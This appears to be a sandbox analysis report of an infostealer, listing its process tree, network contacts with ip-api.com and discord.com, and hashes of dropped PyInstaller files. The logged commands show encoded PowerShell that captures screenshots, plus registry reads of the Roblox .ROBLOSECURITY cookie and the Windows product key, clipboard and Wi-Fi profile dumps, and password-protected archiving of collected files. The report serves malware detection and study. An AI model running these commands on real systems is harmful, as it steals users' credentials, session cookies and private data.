AbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\SysWOW64\tasklist.exe

tasklist /FO LIST

C:\Windows\SysWOW64\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uv0yazf4\uv0yazf4.cmdline"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\SysWOW64\getmac.exe

getmac

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3476"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 3476

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4E4A.tmp" "c:\Users\Admin\AppData\Local\Temp\uv0yazf4\CSCEA4EBACB51ED4AC78CEBE87F415E4A33.TMP"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4916"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 4916

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4452"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 4452

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4260"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 4260

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2012"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 2012

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5016"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 5016

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4492"

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv sxh5qXxU/UWbc2puDp82ow.0.2

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 4492

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49642\rar.exe a -r -hp"horns123" "C:\Users\Admin\AppData\Local\Temp\QWF5y.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI49642\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI49642\rar.exe a -r -hp"horns123" "C:\Users\Admin\AppData\Local\Temp\QWF5y.zip" *

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.179.89.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI49642\python311.dll

MD5 711da56eb35a88095f2baad0e821aa24
SHA1 2755f0d62c54642e936b63974fecc48a971e02e8
SHA256 d8c4c37f8826d9f906686a6b89ba3e37ee766be2893b0a7a9f49fd74f3e6f7a6
SHA512 556151238325dcd7b6d24864b39414cb0d4c2b18e98ac2446a2939bf0312d5b58128f6601e739c300bf3a38c4ddb84078a7b2e800d4e59875c21e23468e38a01

C:\Users\Admin\AppData\Local\Temp\_MEI49642\VCRUNTIME140.dll

MD5 1d4ff3cf64ab08c66ae9a4013c89a3ac
SHA1 f9ee15d0e9b0b7e04ff4c8a5de5afcffe8b2527b
SHA256 65f620bc588d95fe2ed236d1602e49f89077b434c83102549eed137c7fdc7220
SHA512 65fbd68843280e933620c470e524fba993ab4c48ede4bc0917b4ebe25da0408d02daec3f5afcd44a3ff8aba676d2eff2dda3f354029d27932ef39c9fdea51c26

memory/4164-24-0x0000000075110000-0x0000000075620000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI49642\base_library.zip

MD5 32ede00817b1d74ce945dcd1e8505ad0
SHA1 51b5390db339feeed89bffca925896aff49c63fb
SHA256 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a
SHA512 a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_ctypes.pyd

MD5 c917494b6c8c29361e42072dd17ade16
SHA1 f06b04f2c2cf9d84b7d25bb9aeebc6436d2b2bdf
SHA256 bf1454154ea8b62616461660e084c13d199f0570dc14f0e02d25b053f63ce300
SHA512 b064494c6c292969a8694f006f691b9ba00181a1d11c310ddfaa94f3b908248e5098a9e322008ee081e215c1aeed5b6c4bfeab7ac84e0dd88999fc094b4f672f

memory/4164-30-0x00000000750C0000-0x00000000750DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI49642\libffi-8.dll

MD5 50d1bacecfb4df4b7f4080803cb07e4a
SHA1 e4fd81cc1de13291f5a113f386e831396d6db41d
SHA256 d555fc44125cfa750721ecd47ef64b5e1ecebbe5e94e25ea47c78dd797a94c6f
SHA512 12f9a4989ce535f3907b894589c9df18832c057d58d0674340c80d28171fdd6b2c4a1f0f581083ce4167e51013b913f05b694b370dbc3bfc43a3528814168156

memory/4164-32-0x00000000750B0000-0x00000000750BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI49642\blank.aes

MD5 036f6d1f6c2f71c67bc40d973c3ee020
SHA1 cf3a0725f795c2bc2010ea592e0bcbcaecb5fbfe
SHA256 e491504397f5d7211c3f66f2dc7c15a56a18598039bf1b1377db9183c0f8f7c9
SHA512 517eb8b03cb63bac8b04fee134042b26837812a3cc5ff4ae2ff7a80d4aea9c1aa6f132c966d85cd13172c469248132cf08324d6ee7223ce5cdae9d0fb60bc9d0

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_ssl.pyd

MD5 b0b8317d4311645ef24652afc8253cbf
SHA1 c3e54221e31432cc4cf2a18e79617391be445ffb
SHA256 d1da4f2983a8621b5b9a17fa6f603a9e7c3342f130eaacb36003ca7868935719
SHA512 8812394a68bcc1aa50776e0b3cb5c4acd979621b84a29db9930f137f510e4db1106ff07083d23c37ff338f55474a65349162e2ff51b5c49ad375a94efeab057e

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_sqlite3.pyd

MD5 648d185e67616e97457ab675d4c230b5
SHA1 5db9230c200c6a6ee29aec12f68aaed9aab0c3c8
SHA256 0e9442dda8326e3006d1e367fcf8eb8eb3fb328341aaa0ab0f3c5a4345770cce
SHA512 02726e221f9e0faa68ea36dc601da57de1ebd77905055e7d8b66c6ab643e50f58b422f490c6048a373ddbb5208e94e98875b3a043e598f487ac330b962237c6a

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_socket.pyd

MD5 722d7afdd01ec565a432cce7d8bfd8ed
SHA1 e7c6bab41e0fc79a247eeb014d584b507fd37a96
SHA256 6eeeac340cabb9e8ac3aef6d63e3891ef830817894de18f42f78459b3ff9d4a6
SHA512 6480d57eec5c59510e9401edf55aa1e8b1ea816a8e4263fcaf98a4fc4f91e4126b1cafad822ca2163329c339bfa7c24ecd51302ff543fcdb7e68b9917b7e6526

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_queue.pyd

MD5 f002633067073ce11b6b7397c2a48624
SHA1 7c9242a89f75b20ef19817425b3c88c17a23ddda
SHA256 90a5855f580838f5810f1d866380fc4a6cf7b16afb57e214b3fc49b27dcb0676
SHA512 1b6301cb2df1276806dd5f8671d11f3ce91841ad3cee92633cb86d648d8285ced5a77aac064a1108451745c466c494eb16cf74d4a56dc6d6204f681238da8d16

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_lzma.pyd

MD5 6ff7a730ddd5f767aa1975d3784c35a9
SHA1 64b89b1d29d66cf794f6fc3b30ea0f467d2e05c8
SHA256 f17f1359bfa5e65b504c0d1b9e949e755b4d36bc3d9d34dfe24207371e3be92a
SHA512 335d7ec2d76967bf04b53fa17ce5d0205f6cd4f22521fab21384cabc43c968a7b26efe77f779d60380a7262f4ccc2e7877ad26ef4784061390eee517f3b83115

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_hashlib.pyd

MD5 fc7927b65769cf47c6299402acdff309
SHA1 ab31ac116af567e551e5de9c6a5d69e98726b561
SHA256 f99a9e0c3df7de17123588c9f8db37c7ac79b7868084efcc706bd73644d06c75
SHA512 80a6ed86dba65df5619d402a0465dc9e696508623dfcaf6e0ebc5a5fc2da891f9e9694abad00e281cbead015e42e7aec674fb233c9a6140c4fd1d2f3111252f2

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_decimal.pyd

MD5 35642e5645ccfa5fa3616a4f171c6ab0
SHA1 b555808ca4ba195941ad9b50fe95f9d6ce0a8d50
SHA256 f57bd98ca4c2a7a67e6104e6eab7acf7f6a0c0f09d88efcb1688d67e298b6d7c
SHA512 4eb499dd35002982b4b37fe27a870b8a53248657e01b9aeaf25d2485c9fbef474d2f2cbe1e945b1301c87db840913d9cb802ba861e10f59010ae2e5a50f044ed

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_bz2.pyd

MD5 524989939f0351e080644e8c34ccfae5
SHA1 5d8974926381f844118c8b5455d0e7e133f7566c
SHA256 2fd24d9893d41508d1736972f1a4fb241c93beaa49895977e563faf8214410de
SHA512 f6800a7eb6f655e8ebd2c2c33da02252a019ab3085d1947dd50a69206fc2be912c8e11ff10119c4374996248c0ef4d92462043dce4bc08065ebbd12ba82cbaf4

C:\Users\Admin\AppData\Local\Temp\_MEI49642\unicodedata.pyd

MD5 6a414e240bd7075c730f0873c3d66cbe
SHA1 22e5f2aee0f0342114aff9d959dfc826c63a86c4
SHA256 e249ff5b219e838f6198a256b64a70025877c797e65cbffc2eda594a76e1c1ac
SHA512 e5c626388bf7f0d93bd6bf89e8f723a413311e98807e32458cff8ab0d95519402e708d73446486db60b9faa010aebfdec0ac78a9bf9551fbaa33a396510682dc

C:\Users\Admin\AppData\Local\Temp\_MEI49642\sqlite3.dll

MD5 b2a51ffbb7178ad2ccb0fab921632b6d
SHA1 3d20de641c4f07d4f5cdb55a73e9f6db3d2df4b0
SHA256 8fd5e24c37b48442f0627fbdda965fc0daab1c943b54afdb86170af9bc743054
SHA512 c5988f6db64f0a1eac7cf377f46f6311e09c334e5f765d995e1611ec224944d6db151edeb27530c1c8b6e4d917ba8d5dfd69537728f729124357979aca136f5a

C:\Users\Admin\AppData\Local\Temp\_MEI49642\select.pyd

MD5 cb4299085672ed660952b896cd01ee28
SHA1 40b352d2afd264ed7bf3606dd867a83d5cffa30c
SHA256 0ad2612b3507ddbae829fb57b6ac7502edc21dcce331cbd415f229ff0d558250
SHA512 47c0ba29aeca732c9e2276e13f87c11a14764dfd47d6f0499034cdddcbb6d1ddd29cd0d8ee87bf7429bdcac5fff187ea4306ffd1e8bc026847e7e24556489f35

C:\Users\Admin\AppData\Local\Temp\_MEI49642\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI49642\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI49642\libssl-3.dll

MD5 600f861907d668d914d16a277b845d04
SHA1 f37452a1bf601a156f12f927e97a005d0763fcac
SHA256 677b0d256dc23818ee27799f92fe3795f0e75b57e707fcc3897062db673c0926
SHA512 0ffc4f578de4af6b397e76e696b58973e2928f9f4dacd02a73993945497310d6acdbefaaa0a5c75eb1f8052c1ef18189b57989db0183fe50a66b0c3d7264e17c

C:\Users\Admin\AppData\Local\Temp\_MEI49642\libcrypto-3.dll

MD5 113de1bf32512cb3c521bb6f7b5b11c0
SHA1 9387afface76e420735d2f32646b12698ccb4f18
SHA256 d7e56c6b5c73d67a7e7c5e73700f1696e944eb013f3d14ff9f983c4f93594d01
SHA512 f97f9c8952b40f686a119111585c3231d23dc33edab7f557ac6f69f82e83d0ea375b67aa036e9b339853ee388cc62cac55e23b5a9323d8492b35ca9ba3e9f8e8

memory/4164-54-0x0000000075080000-0x00000000750A7000-memory.dmp

memory/4164-56-0x0000000075060000-0x0000000075078000-memory.dmp

memory/4164-58-0x0000000075040000-0x000000007505B000-memory.dmp

memory/4164-60-0x0000000074F00000-0x0000000075037000-memory.dmp

memory/4164-62-0x0000000074EE0000-0x0000000074EF6000-memory.dmp

memory/4164-64-0x0000000074E90000-0x0000000074E9C000-memory.dmp

memory/4164-66-0x0000000075110000-0x0000000075620000-memory.dmp

memory/4164-67-0x0000000074E60000-0x0000000074E8C000-memory.dmp

memory/4164-69-0x0000000074DB0000-0x0000000074E59000-memory.dmp

memory/4164-73-0x0000000074A20000-0x0000000074DAC000-memory.dmp

memory/4164-74-0x00000000032E0000-0x000000000366C000-memory.dmp

memory/4164-72-0x00000000750C0000-0x00000000750DE000-memory.dmp

memory/4164-77-0x00000000749B0000-0x00000000749C0000-memory.dmp

memory/4164-76-0x00000000750B0000-0x00000000750BD000-memory.dmp

memory/4164-79-0x00000000749A0000-0x00000000749AC000-memory.dmp

memory/4164-83-0x0000000074880000-0x0000000074998000-memory.dmp

memory/2696-84-0x00000000044F0000-0x0000000004526000-memory.dmp

memory/4092-109-0x0000000004E60000-0x0000000005488000-memory.dmp

memory/1400-128-0x00000000057F0000-0x0000000005812000-memory.dmp

memory/1400-129-0x0000000005FF0000-0x0000000006056000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ymcnr2tk.rql.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2396-130-0x0000000005230000-0x0000000005296000-memory.dmp

memory/4092-156-0x0000000005580000-0x00000000058D4000-memory.dmp

memory/4164-183-0x0000000074F00000-0x0000000075037000-memory.dmp

memory/4164-184-0x0000000074EE0000-0x0000000074EF6000-memory.dmp

memory/4164-177-0x0000000075110000-0x0000000075620000-memory.dmp

memory/4164-191-0x0000000074880000-0x0000000074998000-memory.dmp

